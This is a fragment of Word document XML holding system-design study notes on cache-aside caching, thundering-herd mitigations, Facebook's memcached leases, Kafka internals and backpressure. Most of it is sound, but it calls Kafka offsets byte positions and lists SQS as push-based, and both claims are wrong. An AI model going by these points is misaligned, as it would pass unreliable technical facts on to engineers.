    </w:p>
    <w:p w14:paraId="63CC0039" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache-Aside (Lazy Population):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Application checks cache on read. On miss: fetch from database, store in cache, return to client. Writes go directly to the database; cache entry is </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>invalidated</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (deleted, not updated). Next read repopulates the cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24316B71" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>This is the most common pattern because it's simple and flexible. The application owns the caching logic. Cache only contains data that has actually been requested (no wasted cache space for data that's never read).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F394A3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> The </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>thundering herd</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> on cold starts or after mass invalidation. Hundreds of concurrent requests all miss the cache simultaneously, all query the database simultaneously, all attempt to write the result to cache simultaneously (only one write is useful — they're all writing the same value). This causes a brief but severe database load spike.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1999E8BD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thundering Herd Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408264FD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mutex/Locking:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> When a cache miss occurs, the first request acquires a lock and fetches from the database. Other requests for the same key </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wait</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> for the lock, then read from the (now populated) cache. Only one database query per cache miss. Implemented in Redis with SET key value NX PX timeout (set if not exists with expiry) as a distributed lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65691EF1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Probabilistic early recomputation (XFetch algorithm):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Before a key's TTL expires, with probability proportional to how close the TTL is to expiration, </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>preemptively recompute</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> the cache value. As TTL approaches 0, probability approaches 1. This distributes the recomputation work over time rather than having all requests hit the database simultaneously on expiration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD4E603" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Stale-while-revalidate:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Serve the stale cached value to all clients immediately. Asynchronously trigger a single background recomputation. Once complete, update the cache. All clients get a slightly stale response for a brief period, but no client waits and the database sees only one query. Trade-off: brief staleness is acceptable for most use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E88A820" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache Stampede at Global Scale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA6C5D1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>At companies like Facebook, a single viral post may have millions of requests per second. If the cache key for that post expires:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FFB5E0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="215"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Millions of requests simultaneously miss cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F108C5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="215"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Millions of requests simultaneously query the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EA68D2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="215"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Database collapses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC438D9" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Facebook's solution (memcached + lease mechanism):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C5C0B7" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="216"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>On a cache miss, the client requests a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lease</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> from memcached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7EE4D4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="216"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>memcached grants the lease to </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exactly one client</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (the first to request it).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351D6345" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="216"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>That client fetches from the database and writes the result, invalidating the lease.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43762821" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="216"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>All other clients are told to </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wait and retry</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — they poll memcached until the value is populated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EE6091" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="216"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Result: exactly one database query per cache miss, regardless of concurrent requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FB67B4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="64430721">
          <v:rect id="_x0000_i2428" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C633BD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Asynchronous Processing — Decoupling Under Load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BBC137" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Synchronous request-response systems create </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>temporal coupling</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — the caller must wait for the callee to finish. Under load, slow operations in the call chain stall clients, consume threads, and cascade failures. Asynchronous processing breaks this coupling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F00F81" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Message Queue Internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8FAE5E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Apache Kafka Architecture — Deep Dive:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56212949" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Kafka organizes messages into </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>topics</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>. Topics are split into </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>. Each partition is an </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ordered, immutable, append-only log</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> stored on disk. This is the fundamental data structure — not a queue (which implies consumption deletes the message), but a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (messages persist until a retention policy removes them, regardless of consumption).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5139A6E4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Partition storage on disk:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Each partition is a directory containing </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>segment files</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>. As the partition grows, the oldest segment files are deleted when they exceed the retention size or time limit. The active segment is written to sequentially — purely sequential disk writes, which are extremely fast (near-RAM speeds on modern SSDs, and even respectable on spinning disks due to no seek overhead).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC45CB6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Each message has an </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — its byte position in the partition log. Offsets are monotonically increasing integers. Consumers track their position by storing their current offset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27256A77" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Producer internals:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Producers write to the partition leader (the Kafka broker currently acting as leader for that partition). The producer batches messages before sending (configurable batch.size and linger.ms). Larger batches mean fewer network round-trips and better compression efficiency. The producer also handles </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>partitioning logic</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — by default, messages with the same key go to the same partition (key-based hashing), ensuring ordering for related messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6172217C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Replication internals:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Each partition has one </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>leader replica</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> and N-1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>follower replicas</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> on different brokers. Followers continuously fetch new messages from the leader (pull-based replication). The </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ISR (In-Sync Replicas)</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> set tracks which follower replicas are within a configurable lag threshold (replica.lag.time.max.ms) of the leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727B6C1C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Producer acks configuration determines durability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EF54C1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="217"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>acks=0: No acknowledgment. Fastest but messages can be lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9316DB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="217"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>acks=1: Leader acknowledges after writing to its local log. Fast but if leader fails before followers replicate, message is lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E07F84" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="217"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>acks=all (or -1): Leader waits for all ISR replicas to acknowledge. No data loss if any ISR member survives. Higher latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7788A804" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Consumer group internals:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Multiple consumers forming a group each own a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>subset of partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — partition ownership is exclusive per group. Kafka's </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Group Coordinator</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (a designated broker) manages partition assignment via the </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>consumer group protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A2A314" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>All consumers in a group send JoinGroup requests to the Group Coordinator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A571966" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>The Coordinator elects one consumer as </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Group Leader</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A761D72" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>The Group Leader runs the </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>partition assignment algorithm</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (e.g., RangeAssignor, RoundRobinAssignor) and submits the assignment to the Coordinator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30546B84" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Coordinator distributes assignments to all consumers via SyncGroup responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AD7D46" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Each consumer starts fetching from its assigned partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ABA37F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>When a consumer fails (stops sending heartbeats within session.timeout.ms), the Coordinator detects it and triggers a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>group rebalance</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — reassigning partitions among surviving consumers. During a rebalance, all consumers stop consuming until the rebalance completes (</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stop-the-world rebalance</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>). This is a significant availability problem for large groups. </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cooperative/incremental rebalancing</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (Kafka 2.4+) mitigates this by only reassigning the partitions that need to move, allowing consumers to continue processing unaffected partitions during the rebalance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAC1A66" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Offset management:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Consumer offsets are stored in an internal Kafka topic (__consumer_offsets). On crash and restart, a consumer reads its last committed offset and resumes from there. This enables </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>at-least-once delivery</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — after a crash, the consumer reprocesses messages since the last committed offset. For exactly-once semantics, the consumer must participate in Kafka transactions (transactional producers + idempotent consumers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7D9E08" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Log compaction:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> An alternative to time/size-based retention. Kafka compacts the log, retaining only the </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>latest value for each key</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>. Older messages with the same key are deleted. Used for </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>changelog topics</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> where only the current state matters (like a database change log where you only care about the latest value of each row, not its full history).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D249716" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Backpressure — The Critical Flow Control Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC4FC57" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Backpressure is the mechanism by which a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>slow consumer signals to producers to slow down</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>. Without backpressure, a fast producer and slow consumer result in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131144D0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="219"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Message accumulation in the queue (memory pressure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1889A3AD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="219"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Eventually, queue overflow → dropped messages or producer blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7358DB97" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="219"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>System-wide instability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ED3574" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Pull-based systems (Kafka) have natural backpressure:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Consumers poll at their own rate. If a consumer is slow, it simply polls less frequently. The producer is never directly blocked — messages accumulate in the Kafka log. The log absorbs the burst (up to retention limits). This is a fundamental design advantage of Kafka over push-based queues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512877E2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Push-based systems (RabbitMQ, SQS)</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> require explicit backpressure mechanisms:</w:t>
      </w:r>
    </w:p>
